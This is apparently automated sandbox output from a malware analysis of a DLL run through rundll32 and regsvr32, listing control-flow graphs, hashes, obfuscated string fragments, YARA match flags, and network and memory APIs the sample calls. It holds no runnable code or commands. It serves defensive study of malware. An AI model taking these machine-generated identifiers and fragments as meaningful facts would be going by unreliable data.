                                                                      • Instruction ID: a9b5704be98d3dd027f678fe08c59eda011257bdda9cf4ed25ea0f7660729633
                                                                      • Opcode Fuzzy Hash: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
                                                                      • Instruction Fuzzy Hash: 8B320DB190078C8BDBB8CF64C8856DD7BF0FB48318F50852DEA1A9B251DBB45685CF98
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 676 18001fc0c-18001fc44 call 1800142a0 679 18001fc46-18001fc4b 676->679 680 18001fc51 679->680 681 18001ff13-18001ff18 679->681 682 18001fe94-18001ff0e call 180012598 680->682 683 18001fc57-18001fc5c 680->683 684 180020169-1800201f9 call 1800190d4 681->684 685 18001ff1e-18001ff23 681->685 682->679 687 18001fc62-18001fc67 683->687 688 18001fde5-18001fe8f call 180012598 683->688 702 1800201fe-180020203 684->702 689 1800200b6-180020164 call 180012598 685->689 690 18001ff29-18001ff2e 685->690 695 18002020a-18002026b call 1800190d4 687->695 696 18001fc6d-18001fc72 687->696 688->679 689->679 698 1800200a1-1800200b1 call 1800014f8 690->698 699 18001ff34-18001ff39 690->699 711 180020270-180020291 695->711 706 18001fc78-18001fc7d 696->706 707 18001fd57-18001fde0 call 180012598 696->707 698->679 700 180020003-180020091 call 180021434 699->700 701 18001ff3f-18001ff44 699->701 700->711 723 180020097-18002009c 700->723 701->702 709 18001ff4a-18001fffe call 180012598 701->709 710 180020205 702->710 702->711 715 18001fc83-18001fc88 706->715 716 18001fd1f-18001fd52 706->716 707->679 709->679 710->679 715->702 720 18001fc8e-18001fd1a call 18001e938 715->720 716->679 720->679 723->679
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_180001000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $T$?F$QP|m$qjf$tZp
                                                                      • API String ID: 0-3477398917
                                                                      • Opcode ID: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
                                                                      • Instruction ID: e54beaa769b94aae3cb673a52a2b60ade73482c6e5d3d936cdc9b6ae13d51efd
                                                                      • Opcode Fuzzy Hash: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
                                                                      • Instruction Fuzzy Hash: 0B122870A0470CDFCF69DFA8C08A6DDBBF2FB44344F1091A9E816AB261D7759A19CB41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_180001000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: JQ$k&($t$v$x\J
                                                                      • API String ID: 0-1134872184
                                                                      • Opcode ID: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
                                                                      • Instruction ID: 7c1fd17b310acde7e359d6be57bcfb6c2dd011f2caef592e77d3cba241376f6b
                                                                      • Opcode Fuzzy Hash: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
                                                                      • Instruction Fuzzy Hash: F312E0B0504709EFCB99DF28C18AADE7BF0FB48308F40812AF80A9B254D774DA58DB45
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_180001000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: R$)H8$?rIc$L==$V
                                                                      • API String ID: 0-2512384441
                                                                      • Opcode ID: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                      • Instruction ID: 6f6f9af97a41f07aad9f9d1cbd67af5334817a93c453241fb2a5d498ae2065c2
                                                                      • Opcode Fuzzy Hash: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                      • Instruction Fuzzy Hash: 3541D0B090074E8BCF48CF64D49A5DE7FB0FB68398F20421DE856A6250D3B896A5CFC5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_180001000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Qq$bt$vird$+$S
                                                                      • API String ID: 0-3373980505
                                                                      • Opcode ID: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                      • Instruction ID: 8c34661c01ca41a1498f33dadfb9b2381b3c020394efcb6cfebc1cbd8490f91c
                                                                      • Opcode Fuzzy Hash: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                      • Instruction Fuzzy Hash: 8831C2B081038A8FDB45CF64C88A5DE7BF0FB58358F115A19F869A6250D3B4D668CF81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_180001000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: V$@$P9$^_"
                                                                      • API String ID: 0-1880944046
                                                                      • Opcode ID: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
                                                                      • Instruction ID: ef3f81825b514374c5d287d432cdf068934c0dc0259921085eace1de493a05f6
                                                                      • Opcode Fuzzy Hash: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
                                                                      • Instruction Fuzzy Hash: B6F1DF70504749EFCB98CF28D18AACE7BE0FB48348F50812AF81A9B264D770DA59DB45
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_180001000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: =_$F)k$b/$syG
                                                                      • API String ID: 0-3955183656
                                                                      • Opcode ID: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
                                                                      • Instruction ID: 3a63fdd7148b145f5d2717dabea2a2fa508061acbcc25a132c341bfe6e9ad30f
                                                                      • Opcode Fuzzy Hash: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
                                                                      • Instruction Fuzzy Hash: DED12771A0478D8BCF59DFA8C88A6EEBBB0FB48344F10421DE846A7650D7B4D909CF85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_180001000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #X$'Xsa$iJ6$vG
                                                                      • API String ID: 0-746338152
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_180001000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: *i^$MIC$-Z$]2
                                                                      • API String ID: 0-498664264
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_180001000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: B$EG$QsF$_
                                                                      • API String ID: 0-784369960
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_180001000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: -`G$.$5B.Y$Z`35
                                                                      • API String ID: 0-1363032466
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_180001000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: *+_$WSh$\O$#o
                                                                      • API String ID: 0-1846314129
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_180001000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: .B$O$M*K$\<
                                                                      • API String ID: 0-3225238681
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_180001000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $$$$xVO$~O
                                                                      • API String ID: 0-3655128719
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_180001000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ,IW$G$JMg$l
                                                                      • API String ID: 0-1370644289
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_180001000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ,$,$2S=$i`}G
                                                                      • API String ID: 0-4285990414
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Execution Graph

                                                                      Execution Coverage:18.9%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:5%
                                                                      Total number of Nodes:80
                                                                      Total number of Limit Nodes:9

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.828890628.0000000000F20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_f20000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                      • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                      • API String ID: 394283112-2517549848
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829091404.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #X$Ec;$J$^c$^c$n
                                                                      • API String ID: 0-2929744921
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829091404.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: =_$F)k$b/$syG
                                                                      • API String ID: 0-3955183656
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829091404.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 5IF$P)#
                                                                      • API String ID: 0-1025399686
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829091404.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ConnectInternet
                                                                      • String ID: :G?$C
                                                                      • API String ID: 3050416762-1225920220
                                                                      • Opcode ID: 76a7b635ccb7068e30ecf2b503a3beb8f1d88f81d4224a3a6f9b87d06452e60c
                                                                      • Instruction ID: f2a8b8884ccc4c3404819a5ba5e10ed0cdd0f68caef2c301b3e7290f999a0a2a
                                                                      • Opcode Fuzzy Hash: 76a7b635ccb7068e30ecf2b503a3beb8f1d88f81d4224a3a6f9b87d06452e60c
                                                                      • Instruction Fuzzy Hash: 5941F67450CB888FD7A8DF18D0857AAB7E0FB98314F508A5EE8CDC7296DB749844CB46
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829091404.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID: gF\
                                                                      • API String ID: 823142352-1982329323
                                                                      • Opcode ID: 7df644aaf73cc9bcde4b6fb7fa72ed7f80eca5e2f74ec0139d961ef78fad827b
                                                                      • Instruction ID: 218d4d5182cb26b0f36475523bc21bdebfc34a2f4da3002633262ff40041eb9b
                                                                      • Opcode Fuzzy Hash: 7df644aaf73cc9bcde4b6fb7fa72ed7f80eca5e2f74ec0139d961ef78fad827b
                                                                      • Instruction Fuzzy Hash: 1931697051C7848BD778DF28D48679ABBE0FB89304F10891EE88DC3352DB709885CB86
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829091404.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: HttpOpenRequest
                                                                      • String ID: :G?
                                                                      • API String ID: 1984915467-1508054202
                                                                      • Opcode ID: 21630c4fbef06d8aacd4c702dff3e94d0932750c237c7792a79e645746d5d1eb
                                                                      • Instruction ID: 60d2efcdc3634c8de813e735c521a1a1b2f1d3197bf379f764bafd55f5181dd8
                                                                      • Opcode Fuzzy Hash: 21630c4fbef06d8aacd4c702dff3e94d0932750c237c7792a79e645746d5d1eb
                                                                      • Instruction Fuzzy Hash: 83314E7060CB848FDBA8DF18D08679BB7E0FB98315F50455DE88CC7296DB789944CB86
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829091404.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: InternetOpen
                                                                      • String ID: :G?
                                                                      • API String ID: 2038078732-1508054202
                                                                      • Opcode ID: 73d4d0fe1beb5fabfcdff42c943db3c290933a411410652e7bad060f5d798a44
                                                                      • Instruction ID: c9298170b99e71c9961e7bb575de84f4b40d7dd1197e6373e1c7e5d4160ea6d3
                                                                      • Opcode Fuzzy Hash: 73d4d0fe1beb5fabfcdff42c943db3c290933a411410652e7bad060f5d798a44
                                                                      • Instruction Fuzzy Hash: 6F110A71518B888BD3A4DF64D48979BB7E1FB88319F50CA1DF4D9C6250DB788589CB02
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829091404.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateThread
                                                                      • String ID:
                                                                      • API String ID: 2422867632-0
                                                                      • Opcode ID: e7c4e665c3955ccb08a2ed1da7b867fe01ee184c9f438c553d3e32e703deb0b1
                                                                      • Instruction ID: c545beb4aab352fd45c13a3c06d211153dc7cc573a2023b45670cfe369ebb01f
                                                                      • Opcode Fuzzy Hash: e7c4e665c3955ccb08a2ed1da7b867fe01ee184c9f438c553d3e32e703deb0b1
                                                                      • Instruction Fuzzy Hash: 0731F67061CB448FD7A8DF68D48579ABBE0FB88304F508A5EE88CD7356DB349944CB86
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829091404.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: InformationVolume
                                                                      • String ID:
                                                                      • API String ID: 2039140958-0
                                                                      • Opcode ID: 88af29f83271a8505691566097a2d6f523e627b34a42d7322f8369dcba0ae3fb
                                                                      • Instruction ID: 89e8e56e51c5a60af2ecd67268569f3ffacd31b875f751963744359e30ad4776
                                                                      • Opcode Fuzzy Hash: 88af29f83271a8505691566097a2d6f523e627b34a42d7322f8369dcba0ae3fb
                                                                      • Instruction Fuzzy Hash: 2B31407051CB448FD7A8DF18D4C579AB7E0FB88315F60855EE88CC7255CB749948CB86
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%